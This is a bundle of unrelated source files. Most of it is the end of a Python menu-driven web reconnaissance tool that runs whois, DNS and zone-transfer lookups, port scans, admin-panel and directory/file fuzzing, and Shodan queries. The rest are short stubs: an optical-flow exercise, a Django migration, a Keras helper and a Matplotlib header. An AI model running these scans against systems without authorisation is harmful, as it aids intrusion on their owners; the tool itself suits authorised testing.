web_pentest_outputfile.write('[+] Whois Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_whois)
web_pentest_outputfile.write('\n' + str(wp_whois))
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 3:
try:
wp_traceroute = cweb_pentest.traceroute(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Traceroute Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_traceroute)
web_pentest_outputfile.write('\n' + wp_traceroute)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 4:
try:
wp_dns_record = cweb_pentest.dns_record(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] DNS Record Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_dns_record:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 5:
try:
wp_reverse_dns_lookup = cweb_pentest.reverse_dns_lookup(ip)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse DNS Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_dns_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_dns_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 6:
try:
wp_zone_transfer_lookup = cweb_pentest.zone_transfer_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Zone Transfer Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_zone_transfer_lookup)
web_pentest_outputfile.write('\n' + wp_zone_transfer_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 7:
if sys.version_info[0] == 3:
port_end = int(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
port_end = int(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_port_scan = cweb_pentest.port_scan(hostname, port_end)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Port Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_port_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 8:
try:
wp_admin_panel_scan = cweb_pentest.admin_panel_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Admin Panel Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_admin_panel_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 9:
if sys.version_info[0] == 3:
subdomain_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subdomain_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subdomain_scan = cweb_pentest.subdomain_scan(hostname, subdomain_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
so_200, so_301, so_302, so_403 = wp_subdomain_scan
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Subdomain Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in so_200:
print ('[+] 200 - ' + i)
web_pentest_outputfile.write('[+] 200 - ' + i + '\n')
for i in so_301:
print ('[!] 301 - ' + i)
web_pentest_outputfile.write('[+] 301 - ' + i + '\n')
for i in so_302:
print ('[!] 302 - ' + i)
web_pentest_outputfile.write('[+] 302 - ' + i + '\n')
for i in so_403:
print ('[!] 403 - ' + i)
web_pentest_outputfile.write('[+] 403 - ' + i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 10:
try:
wp_cms_detect = cweb_pentest.cms_detect(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] CMS Detect - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_cms_detect)
web_pentest_outputfile.write('\n' + wp_cms_detect)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 11:
try:
wp_reverse_ip_lookup = cweb_pentest.reverse_ip_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse IP Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_ip_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_ip_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 12:
if sys.version_info[0] == 3:
subnet_input = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subnet_input = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subnet_lookup = cweb_pentest.subnet_lookup(subnet_input)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (wp_subnet_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 13:
try:
wp_links_extract = cweb_pentest.links_extract(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Links Extract Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_links_extract)
web_pentest_outputfile.write('\n' + wp_links_extract)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 14:
if sys.version_info[0] == 3:
directory_list = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
directory_list = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_directory_fuzz1, wp_directory_fuzz2, wp_directory_fuzz3 = cweb_pentest.directory_fuzz(url, directory_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Directory Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_directory_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_directory_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('[+] Response 403:\n')
print ('[+] Response 403')
for i in wp_directory_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 15:
if sys.version_info[0] == 3:
file_list = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
file_list = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_file_fuzz1, wp_file_fuzz2, wp_file_fuzz3 = cweb_pentest.file_fuzz(url, file_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] File Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_file_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_file_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 403:\n')
print ('[+] Response 403')
for i in wp_file_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 16:
if sys.version_info[0] == 3:
shodan_search_query = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename:
shodan_search_output_filename = shodan_search_output_filename + '.txt'
else:
shodan_search_output_filename = shodan_search_output_filename
if sys.version_info[0] == 2:
shodan_search_query = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename:
shodan_search_output_filename = shodan_search_output_filename + '.txt'
else:
shodan_search_output_filename = shodan_search_output_filename
shodan_search_output = open('outputs/web_pentest/shodan/' + shodan_search_output_filename, 'a+')
shodan_search_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_search = cweb_pentest.shodan_search(shodan_search_query, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('------------------------------.\n{1}[{2}#{1}] {3}- {4}Results Found: {5}|\n------------------------------.{0}'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
shodan_search_output.write('\n------------------------------.\n[#] - Results Found: {5}|\n------------------------------.\n'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
for i in wp_shodan_search['matches']:
try:
print ("""{6}[{7}#{6}] {8}- {9}Timestamp:{10} {0}
{6}[{7}+{6}] {8}- {9}IP:{10} {1}
{6}[{7}+{6}] {8}- {9}Port:{10} {2}
{6}[{7}+{6}] {8}- {9}OS:{10} {3}
{6}[{7}+{6}] {8}- {9}Hostnames:{10} {4}
{6}[{7}+{6}] {8}- {9}Data:{10}
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
shodan_search_output.write("""[#] - Timestamp: {0}
[+] - IP: {1}
[+] - Port: {2}
[+] - OS: {3}
[+] - Hostnames: {4}
[+] - Data:
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
except:
pass
shodan_search_output.write('\n\n')
shodan_search_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_search_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 17:
if sys.version_info[0] == 3:
shodan_host = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
else:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
if sys.version_info[0] == 2:
shodan_host = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
else:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
shodan_host_lookup_output = open('outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename, 'a+')
shodan_host_lookup_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_host_lookup = cweb_pentest.shodan_host_lookup(shodan_host, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ("""--------------------------.\n{1}[{2}#{1}] {3}- {4}General Information:{0}|\n--------------------------.
{1}[{2}#{1}] {3}- {4}IP:{0} {5}
{1}[{2}#{1}] {3}- {4}Ports:{0} {6}
{1}[{2}#{1}] {3}- {4}Tags:{0} {7}
{1}[{2}#{1}] {3}- {4}City:{0} {8}
{1}[{2}#{1}] {3}- {4}Country:{0} {9}
{1}[{2}#{1}] {3}- {4}Organization:{0} {10}
{1}[{2}#{1}] {3}- {4}ISP:{0} {11}
{1}[{2}#{1}] {3}- {4}Last Update:{0} {12}
{1}[{2}#{1}] {3}- {4}Hostnames:{0} {13}
{1}[{2}#{1}] {3}- {4}ASN:{0} {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
shodan_host_lookup_output.write("""--------------------------.\n[#] - General Information:|\n--------------------------.
[#] - IP: {5}
[#] - Ports: {6}
[#] - Tags: {7}
[#] - City: {8}
[#] - Country: {9}
[#] - Organization: {10}
[#] - ISP: {11}
[#] - Last Update: {12}
[#] - Hostnames: {13}
[#] - ASN: {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
print ('------------------------.\n{1}[{2}#{1}] {3}- {4}Services / Banner:|\n------------------------.{0}'.format(reset, blue, green, yellow, cyan))
shodan_host_lookup_output.write('\n------------------------.\n[#] - Services / Banner:|\n------------------------.\n'.format(reset, blue, green, yellow, cyan))
for i in wp_shodan_host_lookup['data']:
print ("""{1}[{2}#{1}] {3}- {4}Timestamp:{0} {5}
{1}[{2}+{1}] {3}- {4}Port:{0} {6}
{1}[{2}+{1}] {3}- {4}Transport:{0} {7}
{1}[{2}+{1}] {3}- {4}Data:{0}
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write("""[#] - Timestamp: {5}
[+] - Port: {6}
[+] - Transport: {7}
[+] - Data:
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write('\n\n')
shodan_host_lookup_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 90:
main()
elif choice == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PenBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if '://' in target:
ohostname = target.replace('https://', '').replace('http://', '')
else:
ohostname = target
web_pentest_output = ohostname + '-' + month + mday + '.txt'
web_pentest_outputfile = open('outputs/web_pentest/' + web_pentest_output, 'a+')
web_pentest_outputfile.write('\n\n\n[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
set_target(target, 1)
elif choice == 99:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
def main():
print ("""{3}[ {5}PenBlood Menu {3}]
{2}01{3}) {5}Web Pentest / Information Gathering
{2}02{3}) {5}Web Application Attack
{2}03{3}) {5}Generator
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if choice == 1:
web_pentest()
elif choice == 2:
web_application_attack()
elif choice == 3:
generator()
elif choice == 99:
print ('{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if __name__ == '__main__':
create_directories()
clear()
banner()
main()
|
py | b41534d0feb557aa3d3fad35f9d694aef8487791 | # import cv2
import numpy as np
from flow_utils import *
from utils import *
#
# Task 3
#
# Load and use a pretrained model to estimate the optical flow of the same two frames as in Task 2.
# Load image frames
frames = [cv2.imread("resources/frame1.png"),
cv2.imread("resources/frame2.png")]
# Load ground truth flow data for evaluation
flow_gt = load_FLO_file("resources/groundTruthOF.flo")
# TODO: Load the model.
#
# ???
#
# TODO: Run model inference on the two frames.
#
# ???
#
# Create and show visualizations for the computed flow
#
# ???
#
|
py | b415350004f7cbef55f75afb649de4ae35a2aa42 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Goods'
db.create_table('web_goods', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=20)),
('value', self.gf('django.db.models.fields.FloatField')()),
('descript', self.gf('django.db.models.fields.CharField')(max_length=254)),
('details', self.gf('django.db.models.fields.TextField')()),
('goodsImg', self.gf('django.db.models.fields.files.FileField')(max_length=100)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['web.Admin'])),
))
db.send_create_signal('web', ['Goods'])
def backwards(self, orm):
# Deleting model 'Goods'
db.delete_table('web_goods')
models = {
'web.admin': {
'Meta': {'object_name': 'Admin'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.UserType']"}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'web.chat': {
'Meta': {'object_name': 'Chat'},
'content': ('django.db.models.fields.TextField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"})
},
'web.goods': {
'Meta': {'object_name': 'Goods'},
'descript': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'details': ('django.db.models.fields.TextField', [], {}),
'goodsImg': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'web.news': {
'Meta': {'object_name': 'News'},
'content': ('DjangoUeditor.models.UEditorField', [], {'default': "''", 'blank': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'favor_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'news_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.NewsType']"}),
'reply_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'users': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"})
},
'web.newstype': {
'Meta': {'object_name': 'NewsType'},
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'web.reply': {
'Meta': {'object_name': 'Reply'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.News']"}),
'users': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"})
},
'web.usertype': {
'Meta': {'object_name': 'UserType'},
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['web'] |
py | b4153630a939ebd9dd4e182bf4da0371383044d1 | def input_shapes(model, prefix):
shapes = [il.shape[1:] for il in
model.inputs if il.name.startswith(prefix)]
shapes = [tuple([d for d in dims]) for dims in shapes]
return shapes
class Nontrainable(object):
def __init__(self, model):
self.model = model
def __enter__(self):
self.trainable_status = self.model.trainable
self.model.trainable = False
return self.model
def __exit__(self, type, value, traceback):
self.model.trainable = self.trainable_status
|
py | b4153632999c4f56cb12d24641dc3b5a262a91cd | """
Helper functions for deprecating parts of the Matplotlib API.
